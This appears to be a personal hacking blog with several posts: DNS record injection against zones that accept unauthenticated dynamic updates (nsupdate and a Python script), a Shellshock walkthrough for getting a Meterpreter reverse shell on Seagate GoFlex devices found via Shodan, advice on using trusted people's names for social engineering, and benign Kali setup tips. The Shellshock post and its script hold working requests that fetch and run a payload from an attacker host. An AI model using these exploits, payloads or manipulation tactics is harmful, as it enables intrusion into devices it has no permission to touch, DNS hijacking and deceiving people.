Wednesday, December 9, 2015

Exploiting CVE-1999-0184 DNS Poisoning

Yes, this CVE is old, but I keep seeing it, and there is no real tool or exploit guide available, so I thought I would write one up quickly.

This "guide" is for Kali 2. The basics of what's going on: the target DNS server accepts dynamic updates (RFC 2136) from anyone, with no TSIG key or other authentication, so we can add or change records in its zone. Despite the "poisoning" label this is record injection on the authoritative server, not cache poisoning. The one tool we need is nsupdate. If it's not already on your system you can just install it with apt:
apt-get install dnsutils
Now we need a file that has all our commands in it. nsupdate treats lines starting with a semicolon as comments, so keep the notes on their own lines rather than after a command. It should look something like this:
; our target DNS server
server 1.2.3.4
; the zone we are working in
zone corp.company.com
; remove any existing A records for the name first, just in case
update delete evil.corp.company.com. A
update add evil.corp.company.com. 86400 IN A 2.2.2.2
show
send
Save the file as dns. Now just run the following command (-v makes nsupdate use TCP instead of UDP):
nsupdate -v dns
nsupdate reads all the commands in the dns file and sends them to our target DNS server. The show command prints the update message before it is sent, so after a few seconds you should see something similar to this:
Outgoing update query:
;; ->>HEADER<<- opcode: UPDATE, status: NOERROR, id: 0
;; flags:; ZONE: 0, PREREQ: 0, UPDATE: 0, ADDITIONAL: 0
;; ZONE SECTION:
;corp.company.com. IN SOA

;; UPDATE SECTION:
evil.corp.company.com. 0 ANY A
evil.corp.company.com. 86400 IN A 2.2.2.2
If send returns without an error the server accepted our unsigned update. Now just run a quick dig query to make sure it worked:
dig @1.2.3.4 A evil.corp.company.com
If the answer section comes back with 2.2.2.2, the zone takes updates from anyone. A REFUSED or NOTAUTH from the server means it enforces an update policy and is not vulnerable. Remember to remove the test record when you are done (a second batch with just the update delete and send lines). That is all I have for this post. Happy hacking :)
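The same check done at the protocol level, as an added example that is not part of the original post or of nsupdate: it builds the RFC 2136 UPDATE message that the nsupdate batch above produces (one zone, no prerequisites, a delete-RRset and an add, and no TSIG in the additional section), sends it over TCP the way nsupdate -v does, and reads the RCODE back. NOERROR means the zone accepted an unauthenticated update; REFUSED or NOTAUTH means it did not. The server, zone, name and address are the placeholders from the post, and the message id is an arbitrary constant.

```python
import socket
import struct

# Added example, not the original post's tooling. The server, zone, name and
# address used below are the placeholder values from the post.

TYPE_A, TYPE_SOA = 1, 6
CLASS_IN, CLASS_ANY = 1, 255
OPCODE_UPDATE = 5
RCODES = {0: "NOERROR", 1: "FORMERR", 2: "SERVFAIL", 3: "NXDOMAIN",
          4: "NOTIMP", 5: "REFUSED", 6: "YXDOMAIN", 7: "YXRRSET",
          8: "NXRRSET", 9: "NOTAUTH", 10: "NOTZONE"}


def encode_name(name):
    """Dotted name -> DNS wire-format labels (no compression)."""
    out = b""
    for label in name.rstrip(".").split("."):
        raw = label.encode("ascii")
        if not 1 <= len(raw) <= 63:
            raise ValueError("bad label %r in %r" % (label, name))
        out += bytes([len(raw)]) + raw
    return out + b"\x00"


def build_update(zone, name, ipv4, ttl=86400, msg_id=0x1234):
    """RFC 2136 UPDATE equivalent to the nsupdate batch in the post:
    'update delete <name> A' followed by 'update add <name> <ttl> IN A <ipv4>'."""
    flags = OPCODE_UPDATE << 11                 # QR=0, RCODE=0
    header = struct.pack("!HHHHHH", msg_id, flags,
                         1,   # ZOCOUNT: one zone
                         0,   # PRCOUNT: no prerequisites
                         2,   # UPCOUNT: delete + add
                         0)   # ADCOUNT: no TSIG record, which is the whole point
    zone_rr = encode_name(zone) + struct.pack("!HH", TYPE_SOA, CLASS_IN)
    # "Delete an RRset": CLASS ANY, TTL 0, empty RDATA (RFC 2136 section 2.5.2)
    delete_rr = encode_name(name) + struct.pack("!HHIH", TYPE_A, CLASS_ANY, 0, 0)
    rdata = socket.inet_aton(ipv4)
    add_rr = encode_name(name) + struct.pack("!HHIH", TYPE_A, CLASS_IN, ttl, len(rdata)) + rdata
    return header + zone_rr + delete_rr + add_rr


def parse_rcode(response, expected_id):
    """Return the RCODE name from the server's reply header."""
    if len(response) < 12:
        raise ValueError("truncated DNS header")
    msg_id, flags = struct.unpack("!HH", response[:4])
    if msg_id != expected_id:
        raise ValueError("reply id %#x does not match %#x" % (msg_id, expected_id))
    if not flags & 0x8000:
        raise ValueError("QR bit clear: not a response")
    rcode = flags & 0x000F
    return RCODES.get(rcode, "RCODE%d" % rcode)


def accepts_unauthenticated_updates(rcode):
    """NOERROR means the zone took our unsigned update: that is the finding.
    REFUSED or NOTAUTH means the server enforces update-policy or TSIG."""
    return rcode == "NOERROR"


def _recv_exact(sock, n):
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("server closed connection early")
        buf += chunk
    return buf


def send_tcp(server, message, port=53, timeout=5.0):
    """Send the update over TCP with the 2-byte length prefix, as nsupdate -v does."""
    with socket.create_connection((server, port), timeout=timeout) as sock:
        sock.sendall(struct.pack("!H", len(message)) + message)
        (length,) = struct.unpack("!H", _recv_exact(sock, 2))
        return _recv_exact(sock, length)


if __name__ == "__main__":
    msg = build_update("corp.company.com", "evil.corp.company.com", "2.2.2.2")
    rcode = parse_rcode(send_tcp("1.2.3.4", msg), 0x1234)
    verdict = "accepts unauthenticated updates" if accepts_unauthenticated_updates(rcode) else "rejected"
    print(rcode, "->", verdict)
```

Because the delete and the add travel in one message, the server applies both atomically; if you only want a non-destructive probe, send the message with a prerequisite section instead of an update section (PRCOUNT 1, UPCOUNT 0) and look at the RCODE, since a server that ignores unsigned updates will still answer REFUSED to the empty update.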

Wednesday, December 2, 2015

Using famous fake names

A while ago I was at a stl2600 meeting and the topic was using fake identities of famous people for online services and events IRL, as a way to protect your real identity while staying easy for you to remember. They gave a number of great examples and even links to sites to help come up with the fake ID.

To expand on that idea, I suggested there might be a social engineering impact if you choose your alias wisely. If you use the name of a positive supporting character from a movie, people might be less likely to question you, and might even grant you privileges they otherwise would not, presumably because they subconsciously associate you with that character.

The reason I suggest a supporting character and not a main one is that people have much better recall of a leading character. The idea is to use a name that is linked to positive feelings someone can't quite put their finger on, hopefully letting that feeling of trust carry over to anyone with that name or one that sounds similar.

Under a more targeted social engineering attack you might use the name of a favorite sibling or relative. Yes, the target will pick up on this right away, but hopefully the years of trust the target associates with the ID you chose will be lent to you without the target knowing they are doing so. Results will vary of course. What are your thoughts? Have you done something like this and it worked? Tell us about it.

Thursday, November 12, 2015

Getting a remote shell on any one of 68,000+ Seagate GoFlex devices

I have been scanning some ranges in my free time and came across a Seagate GoFlex Home Network Storage System which my scanner flagged as being vulnerable to Shellshock, but getting a remote shell was no easy task (for me anyway). I ended up having to build a payload with msfvenom, do the execution using Burp Suite, and handle the shell with the Metasploit handler. The best part is this device uses UPnP to tunnel to the Internet, giving us easy access >;)

Start with the payload:
msfvenom -p php/meterpreter/reverse_tcp lport=4444 lhost=1.2.3.4 >msf.txt
Now upload msf.txt to your web server. After the payload is uploaded open metasploit and
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
run 
That should start up our listener. Now open Burp and use Repeater. The User-Agent below is the Shellshock trigger: the "() { :; };" prefix makes bash evaluate the rest of the header as a command when the CGI starts, and the two echos end the HTTP header block so the command output shows up in the response body. Enter the following for the request:
GET /support/ HTTP/1.1
Host: 5.6.7.8
User-Agent: () { :; }; echo Content-Type: text/plain; echo; echo; PATH=/usr/bin:/usr/local/bin:/bin; export PATH; wget http://1.2.3.4/msf.txt -O /tmp/msf.php 2>&1;
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Also don't forget to configure the target correctly. Note the space before 2>&1 in the wget line; without it the shell treats "/tmp/msf.php2" as the output file and the next step finds nothing to run. Hit Go, wait a few seconds, and you should see some wget output; if all went well msf.php is now in the /tmp/ dir of the device. Now we just need to execute it, again with Burp. This time put this in the request:
GET /support/ HTTP/1.1
Host: 5.6.7.8
User-Agent: () { :; }; echo Content-Type: text/plain; echo; echo; PATH=/usr/bin:/usr/local/bin:/bin; export PATH; php /tmp/msf.php;
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
This time when you hit Go, provided your ports are forwarded correctly, you should be able to go back to the msfconsole window and see a session has opened. You won't have root at this point but you can still do a lot of fun stuff. You can find some of these devices on Shodan by searching for "hipname=". If anyone figures out how to get root please share :) Enjoy!

*Count of vulnerable devices taken from Shodan search results, not actual testing.
**I did not test it, but you could try the linux/x86/exec payload in the Metasploit bash bug exploit module to deploy and execute. This would let you keep it all in Metasploit.
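A scripted version of the Burp Repeater steps above, added here as an example and not code from the original post: it builds the raw request with the Shellshock User-Agent, offers a harmless probe that only prints a random marker if bash actually ran it (and tells that apart from an app merely reflecting the header), and produces the two staging commands from the post with the wget redirection written correctly. Host 5.6.7.8, listener 1.2.3.4, the /support/ path and the /tmp/msf.php location are the placeholders from the post; send_raw is a plain socket stand-in for Repeater.

```python
import secrets
import socket

# Added example, not the original post's code. 5.6.7.8, 1.2.3.4, /support/
# and /tmp/msf.php are the placeholder values from the post.


def shellshock_ua(command):
    """User-Agent value that triggers CVE-2014-6271 in a bash-backed CGI.

    bash parses an environment variable starting with '() { :; };' as a
    function definition and executes the trailing text. The two echos close
    the HTTP header block so the command's output lands in the body."""
    return "() { :; }; echo Content-Type: text/plain; echo; echo; " + command


def build_request(host, path, command):
    """Raw HTTP/1.1 request carrying the Shellshock header."""
    lines = [
        "GET %s HTTP/1.1" % path,
        "Host: %s" % host,
        "User-Agent: %s" % shellshock_ua(command),
        "Accept: */*",
        "Connection: close",
        "",
        "",
    ]
    return "\r\n".join(lines).encode("latin-1")


def probe_command(marker):
    """Benign probe: prints the marker only if the command really ran."""
    return "echo %s" % marker


def looks_vulnerable(response, marker):
    """True when the marker was executed, not merely reflected.

    A reflected User-Agent contains the literal 'echo <marker>'; bash output
    contains the bare marker. Requiring the first and rejecting the second
    avoids false positives from apps that echo request headers back."""
    body = response if isinstance(response, bytes) else response.encode("latin-1")
    return marker.encode() in body and ("echo " + marker).encode() not in body


def stage_commands(lhost, remote_path="/tmp/msf.php"):
    """The two commands from the post: fetch the PHP payload, then run it.

    Note the space before 2>&1; without it wget writes to '<remote_path>2'."""
    env = "PATH=/usr/bin:/usr/local/bin:/bin; export PATH; "
    fetch = env + "wget http://%s/msf.txt -O %s 2>&1" % (lhost, remote_path)
    execute = env + "php %s" % remote_path
    return fetch, execute


def send_raw(host, request, port=80, timeout=10.0):
    """Send the request over a plain socket (Burp Repeater replacement)."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(request)
        chunks = []
        while True:
            chunk = sock.recv(4096)
            if not chunk:
                break
            chunks.append(chunk)
    return b"".join(chunks)


if __name__ == "__main__":
    marker = "shock" + secrets.token_hex(4)
    req = build_request("5.6.7.8", "/support/", probe_command(marker))
    print(req.decode("latin-1"))
    # resp = send_raw("5.6.7.8", req)
    # if looks_vulnerable(resp, marker):
    #     fetch, execute = stage_commands("1.2.3.4")
    #     send_raw("5.6.7.8", build_request("5.6.7.8", "/support/", fetch))
    #     send_raw("5.6.7.8", build_request("5.6.7.8", "/support/", execute))
```

Run the probe first: a device that answers with the bare marker is worth the two staging requests, while one that only echoes the header back is not, and the random marker keeps a cached or logged earlier response from being mistaken for a fresh hit.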

Sunday, October 4, 2015

Kali 2 and the MATE desktop

When I first installed Kali 2 in a VM it ran ungodly slow. It was of course GNOME eating resources like a hog, so I decided to use something a little lighter. After some messing around I settled on MATE.

Install MATE:

apt-get install mate-desktop-environment-core

To make it the default session for root (the user you log in as on Kali), run:
echo mate-session > /root/.xsession
Now just reboot and log back in. You should be dropped into the MATE desktop and your Kali install should run much smoother :)

Saturday, September 19, 2015

Kali 2 and OpenVPN without network manager

So I am not a big fan of the network manager UI for OpenVPN and normally opt for the CLI setup. In Kali 2 the old /etc/init.d/openvpn start and service openvpn start didn't seem to work. As a quick workaround I came up with the bash script below. I hope you find it useful.

**NOTE: Put all your certs and the config file in /etc/openvpn, and keep the resolv.conf you want to use while on the VPN in /root/ (the script overwrites /etc/resolv.conf with it, so back up the original if you need it later).

#!/bin/sh
# Bring up OpenVPN from the CLI without network-manager.
# Certs and the .conf live in /etc/openvpn; /root/resolv.conf holds the
# nameservers to use while the tunnel is up.
set -e
cd /etc/openvpn/
# Remove first so a resolvconf-managed symlink is replaced, not written through.
rm -f /etc/resolv.conf
cp /root/resolv.conf /etc/resolv.conf
# Edit vpn-server.conf to whatever your config file is named.
# Backgrounded so the script returns; output stays on this terminal.
openvpn --config vpn-server.conf &


Contents of resolv.conf

nameserver 8.8.8.8
nameserver 8.8.4.4


If anyone knows a better way to do this in Kali 2 please let me know. :)